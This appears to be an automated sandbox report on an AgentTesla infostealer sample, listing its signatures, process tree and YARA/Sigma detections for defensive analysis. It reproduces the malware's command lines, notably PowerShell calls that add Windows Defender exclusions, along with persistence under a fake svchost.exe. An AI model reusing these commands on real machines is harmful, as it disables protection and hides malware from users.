
Windows Analysis Report VknMvPoCXZ

Overview

General Information

Sample Name: VknMvPoCXZ (renamed file extension from none to exe)
Analysis ID: 483863
MD5: 0cecfa83ee6ea6dd1de38462bbedf15c
SHA1: de4dde34707658d98f50de8cf2a182bf7ded2a45
SHA256: a6bdce859b5373990681d6ed6c6133a80330fa2744ea9c1e88018d03ab77feb2
Tags: AfiaWaveEnterprisesOy, AgentTesla, exe, signed

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected AgentTesla
Yara detected AntiVM3
Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Sigma detected: Powershell adding suspicious path to exclusion list
Drops PE files to the startup folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Creates autostart registry keys with suspicious names
Drops executables to the windows directory (C:\Windows) and starts them
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Drops PE files with benign system names
Creates an autostart registry key pointing to binary in C:\Windows
Writes to foreign memory regions
Changes security center settings (notifications, updates, antivirus, firewall)
Sigma detected: Powershell Defender Exclusion
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
One or more processes crash
Very long cmdline option found; this is very uncommon (the option may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Too many similar processes found
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
Creates a start menu entry (Start Menu\Programs\Startup)
Launches processes in debugging mode, may be used to hinder debugging
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Creates files inside the system directory
Found potential string decryption / allocating functions
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to launch a program with higher privileges
Contains capabilities to detect virtual machines
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • VknMvPoCXZ.exe (PID: 2244 cmdline: 'C:\Users\user\Desktop\VknMvPoCXZ.exe' MD5: 0CECFA83EE6EA6DD1DE38462BBEDF15C)
    • AdvancedRun.exe (PID: 3336 cmdline: 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5908 cmdline: 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /SpecialRun 4101d8 3336 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 2968 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2196 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5456 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1036 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6288 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 481F404B.exe (PID: 6392 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' MD5: 0CECFA83EE6EA6DD1DE38462BBEDF15C)
      • AdvancedRun.exe (PID: 6644 cmdline: 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
        • AdvancedRun.exe (PID: 6204 cmdline: 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /SpecialRun 4101d8 6644 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • powershell.exe (PID: 6784 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 5852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 7008 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6812 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 4308 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 4988 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 1284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6748 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6804 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6828 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • aspnet_compiler.exe (PID: 6872 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
    • WerFault.exe (PID: 3880 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 2328 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 3756 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4132 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5888 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6048 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4928 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4736 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 736 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 5264 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • 481F404B.exe (PID: 6852 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' MD5: 0CECFA83EE6EA6DD1DE38462BBEDF15C)
    • AdvancedRun.exe (PID: 6512 cmdline: 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 3152 cmdline: 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /SpecialRun 4101d8 6512 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 6992 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5952 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4776 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2256 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5004 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6952 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 2036 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2244 -ip 2244 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5900 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2244 -ip 2244 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5532 cmdline: 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' MD5: 0CECFA83EE6EA6DD1DE38462BBEDF15C)
    • AdvancedRun.exe (PID: 6820 cmdline: 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 6692 cmdline: 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /SpecialRun 4101d8 6820 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 7112 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2896 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6152 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7132 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6496 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 4496 cmdline: 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' MD5: 0CECFA83EE6EA6DD1DE38462BBEDF15C)
    • AdvancedRun.exe (PID: 6932 cmdline: 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • svchost.exe (PID: 6876 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5892 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000001.00000000.384861016.0000000006BD0000.00000004.00020000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000001.00000000.384861016.0000000006BD0000.00000004.00020000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(53 entries in total; first five shown)

Unpacked PEs

Source | Rule | Description | Author
1.0.VknMvPoCXZ.exe.38d97c0.25.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
1.0.VknMvPoCXZ.exe.38d97c0.25.raw.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
1.0.VknMvPoCXZ.exe.39197e0.9.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
1.0.VknMvPoCXZ.exe.39197e0.9.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
1.0.VknMvPoCXZ.exe.38d97c0.25.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(99 entries in total; first five shown)

Sigma Overview

System Summary:

Sigma detected: Powershell Defender Exclusion
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\VknMvPoCXZ.exe' , ParentImage: C:\Users\user\Desktop\VknMvPoCXZ.exe, ParentProcessId: 2244, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force, ProcessId: 2968
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\VknMvPoCXZ.exe' , ParentImage: C:\Users\user\Desktop\VknMvPoCXZ.exe, ParentProcessId: 2244, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force, ProcessId: 2968
Sigma detected: T1086 PowerShell Execution
Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132762180470220038.2968.DefaultAppDomain.powershell

Malware Analysis System Evasion:

Sigma detected: Powershell adding suspicious path to exclusion list
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\VknMvPoCXZ.exe' , ParentImage: C:\Users\user\Desktop\VknMvPoCXZ.exe, ParentProcessId: 2244, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force, ProcessId: 5456

Jbx Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: VknMvPoCXZ.exe; Virustotal: Detection: 47%
Source: VknMvPoCXZ.exe; ReversingLabs: Detection: 44%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe; ReversingLabs: Detection: 44%
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe; ReversingLabs: Detection: 44%

Exploits:

Yara detected UAC Bypass using CMSTP
Source: VknMvPoCXZ.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: VknMvPoCXZ.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                      Source: Binary string: \??\C:\Windows\mscorlib.pdbUSERDOMAIN=computer source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbE> source: VknMvPoCXZ.exe, 00000001.00000000.400279978.0000000000AD8000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\VknMvPoCXZ.PDB source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb,U}< source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: E:\A\_work\3592\s\out\Release\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb@ source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdbease\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb\aero\Shell\4B6A7152\svch source: svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: ; .pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.508463732.0000000006E40000.00000004.00000001.sdmp
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, AdvancedRun.exe, 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000007.00000000.273104698.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbCOMPUTERNAME=computer source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdb+ source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb* source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: lib.pdb source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: E:\A\_work\3592\s\out\Release\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb9C-4437-8B11-F424491E3931}\Server source: svchost.exe, 00000028.00000002.588815197.0000000007E00000.00000004.00000001.sdmp
